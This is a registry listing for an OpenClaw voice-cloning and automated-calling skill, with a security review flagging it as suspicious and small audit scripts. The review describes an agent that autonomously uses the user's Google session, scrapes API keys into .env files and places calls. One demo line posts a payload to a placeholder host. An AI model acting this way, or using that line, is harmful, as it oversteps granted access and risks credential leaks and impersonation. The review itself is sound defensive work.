georges91560

Voice Agent

by Wesley Armando · GitHub ↗ · v1.0.0 · MIT-0
cross-platform ⚠ suspicious
212 Downloads · 0 Stars · 0 Active Installs · 1 Version
Install in OpenClaw
/install voice-agent-v1
Description
Enables autonomous cloning of your voice via ElevenLabs, converts text to speech, and deploys AI voice agents for automated inbound/outbound calls with Twili...
Usage Guidance
Before installing:
  1. Verify the registry metadata is updated to declare the exact env vars and credential requirements (ElevenLabs, Twilio, Telegram, or email/password).
  2. Inspect the full SKILL.md and voice_generator.py (including truncated sections) to confirm there are no hidden endpoints or undisclosed notification channels.
  3. Understand and consent to the skill using the virtual-desktop's active Google session (this lets it act as a logged-in user).
  4. Run this skill in an isolated workspace or sandbox if you will allow it to create/write API keys and .env files.
  5. If you don't trust automatic browser-based credential creation, opt for manual API key creation and supply only the minimally necessary credentials.
  6. If Telegram notifications are required, confirm where the token is stored and that it won't be used to exfiltrate secrets.
If any of these points are unclear or the registry metadata doesn't match the instructions, do not enable the skill until clarified.
Capability Analysis
Type: OpenClaw Skill
Name: voice-agent-v1
Version: 1.0.0
The skill implements a 'self-configuration' routine in SKILL.md that instructs the AI agent to autonomously navigate the ElevenLabs dashboard via a virtual desktop to extract API keys and write them to the .env file. While aligned with the stated purpose of a 'voice agent,' this pattern of UI-based credential scraping and automated secret management is high-risk. Additionally, the skill possesses broad capabilities for automated outbound calling and workspace-wide file access (voice_generator.py, config.json), which could be leveraged for unauthorized activities if the agent's instructions are compromised.
Capability Assessment
Purpose & Capability
The skill's stated purpose (voice cloning, TTS, Twilio calls) matches the included code and instructions, but the registry metadata omits the sensitive credentials and paths the SKILL.md actually uses. SKILL.md expects ElevenLabs API keys, optional Twilio credentials, Google browser sessions, and Telegram notifications — none of which are declared in the top-level requirements. That mismatch is a red flag for either sloppy packaging or hidden assumptions about available credentials/sessions.
Instruction Scope
Runtime instructions tell the agent to autonomously navigate elevenlabs.io via a virtual-desktop, perform Google OAuth sign-in using the active browser session or fill in email/password, create API keys, copy them, and write secrets into /workspace/voice/config.json and a .env file. The SKILL.md also references Telegram notifications and many workspace read/write paths. These instructions involve accessing and storing sensitive credentials and an external browser session — scope beyond simple TTS generation and worth explicit user consent and review.
Install Mechanism
There is no install spec (instruction-only) and only one Python script is included. That reduces supply-chain risk compared to arbitrary downloads, but the script performs network calls (ElevenLabs API) and writes files to the workspace. The lack of an install step does not remove the need to audit the included code for data exfiltration or hidden endpoints.
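One way to start that audit is to list every hostname that appears as a URL literal in the script and compare it against the hosts you expect. The sketch below is illustrative only: the allowlist, the function names, and the sample text are assumptions, not taken from voice_generator.py, and a static scan like this will miss URLs that are built at runtime.

```python
import re
from urllib.parse import urlparse

# Hosts you expect the skill to contact. This allowlist is an assumption
# for illustration; adjust it after reading the skill's documentation.
EXPECTED_HOSTS = {"elevenlabs.io", "api.elevenlabs.io"}

# Matches http(s) URL literals up to the first quote, bracket, or whitespace.
URL_PATTERN = re.compile(r"https?://[^\s\"'<>)\]]+")


def find_hosts(source: str) -> set[str]:
    """Return every hostname found in an http(s) URL literal in source."""
    hosts = set()
    for match in URL_PATTERN.findall(source):
        try:
            host = urlparse(match).hostname
        except ValueError:
            # Malformed URL literal (e.g. a broken IPv6 bracket); skip it.
            continue
        if host:
            hosts.add(host.lower())
    return hosts


def unexpected_hosts(source: str, expected: set[str] = EXPECTED_HOSTS) -> set[str]:
    """Return hosts found in source that are not on the expected allowlist."""
    return find_hosts(source) - expected


if __name__ == "__main__":
    # Hypothetical script contents, used only to demonstrate the scan.
    sample = '''
    BASE = "https://api.elevenlabs.io/v1"
    requests.post("https://collector.example.net/upload", data=payload)
    '''
    print(sorted(unexpected_hosts(sample)))  # ['collector.example.net']
```

To check the real script, read the file's text and pass it to `unexpected_hosts`; anything it returns deserves a manual look.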
Credentials
The skill will create and store ELEVENLABS_API_KEY and voice IDs and may require ELEVENLABS_EMAIL/ELEVENLABS_PASSWORD and TWILIO_ACCOUNT_SID/AUTH_TOKEN, yet the registry metadata lists no required environment variables. Telegram notifications are described but no Telegram credential is declared. Requesting or grabbing an active Google session via virtual-desktop is sensitive and should be explicitly declared; its absence from the registry metadata is inconsistent with the level of access the skill actually uses.
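The mismatch described here can be checked mechanically by pulling environment-variable-style names out of the instructions and subtracting whatever the registry declares. This is a minimal sketch under stated assumptions: the function names are hypothetical, the regular expression only catches upper-case names containing an underscore, and the instruction text and declared set are supplied by you.

```python
import re

# Matches names such as ELEVENLABS_API_KEY: upper-case words joined by
# underscores. Names without an underscore are ignored (an assumption
# made to avoid matching ordinary acronyms).
ENV_NAME = re.compile(r"\b[A-Z][A-Z0-9]*(?:_[A-Z0-9]+)+\b")


def referenced_env_vars(text: str) -> set[str]:
    """Return every env-var-style name mentioned in the text."""
    return set(ENV_NAME.findall(text))


def undeclared_env_vars(instructions: str, declared: set[str]) -> set[str]:
    """Return names used in the instructions but missing from the declared set."""
    return referenced_env_vars(instructions) - declared


if __name__ == "__main__":
    # Example wording only; paste in the real SKILL.md text instead.
    text = "Write ELEVENLABS_API_KEY to .env. Optional: TWILIO_ACCOUNT_SID."
    print(sorted(undeclared_env_vars(text, declared=set())))
```

With an empty declared set, as the listing reports for this skill, every referenced name comes back as undeclared.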
Persistence & Privilege
The skill writes secrets and config to workspace files (.env and config.json) and creates audit/error logs under the workspace; it also relies on a virtual-desktop skill to access browser sessions. While always:false (so it's not force-included), writing credentials and using another skill's browser session increases persistence/privilege — verify you want a component that can create and store API keys and use an active Google session on your behalf.
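After a sandboxed run, it can help to see which secrets the skill actually left in the workspace without printing them in full. The sketch below parses .env-style text and masks each value. It is an assumption-laden illustration: the helper names are hypothetical, and the parser handles only simple KEY=VALUE lines, not `export` prefixes or multi-line values.

```python
def mask(value: str, visible: int = 4) -> str:
    """Hide all but the last `visible` characters of a secret."""
    if len(value) <= visible:
        return "*" * len(value)
    return "*" * (len(value) - visible) + value[-visible:]


def summarize_env(text: str) -> dict[str, str]:
    """Parse KEY=VALUE lines from .env-style text and return masked values."""
    summary = {}
    for line in text.splitlines():
        line = line.strip()
        # Skip blanks, comments, and lines that are not assignments.
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        # Drop surrounding quotes before masking.
        summary[key.strip()] = mask(value.strip().strip("\"'"))
    return summary


if __name__ == "__main__":
    # Made-up value for demonstration; read the real .env file in practice.
    for name, masked in summarize_env("ELEVENLABS_API_KEY=abcd1234efgh").items():
        print(f"{name} = {masked}")
```

Masking keeps the audit output safe to paste into a review thread while still showing which keys exist.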
How to Use
  1. Make sure OpenClaw is installed (local or Docker)
  2. Run the install command in chat: /install voice-agent-v1
  3. After installation, invoke the skill by name or use /voice-agent-v1
  4. Provide required inputs per the skill's parameter spec and get structured output
Version History
v1.0.0
Voice Agent 1.0.0. Major overhaul: now fully automates voice cloning, ElevenLabs setup, and conversational AI calling, with self-configuration and Telegram notifications.
- Full migration from local API & Whisper/AWS Polly to ElevenLabs: agent now clones voice, generates MP3s, and runs calls via Twilio.
- Autonomous self-configuration: navigates ElevenLabs dashboard via virtual-desktop to generate API keys, clone principal’s voice, and create agents.
- Local scripts and legacy audio handling removed; all config handled in config.json, voice_generator.py, and supporting docs.
- Sends Telegram updates on configuration, voice readiness, audio generation, and call outcomes.
- No manual API key setup required: agent fetches credentials and completes onboarding autonomously.
- Supports audio-driven workflows, scalable text-to-speech, and automated inbound/outbound calls.
Metadata
Slug voice-agent-v1
Version 1.0.0
License MIT-0
All-time Installs 0
Active Installs 0
Total Versions 1
Frequently Asked Questions

What is Voice Agent?

Enables autonomous cloning of your voice via ElevenLabs, converts text to speech, and deploys AI voice agents for automated inbound/outbound calls with Twili... It is an AI Agent Skill for Claude Code / OpenClaw, with 212 downloads so far.

How do I install Voice Agent?

Run "/install voice-agent-v1" in the OpenClaw or Claude Code chat to install it in one step — no extra setup required.

Is Voice Agent free?

Yes, Voice Agent is completely free, licensed under MIT-0. You can download, install and use it at no cost.

Which platforms does Voice Agent support?

Voice Agent is cross-platform and runs anywhere OpenClaw / Claude Code is available.

Who created Voice Agent?

It is built and maintained by Wesley Armando (@georges91560); the current version is v1.0.0.
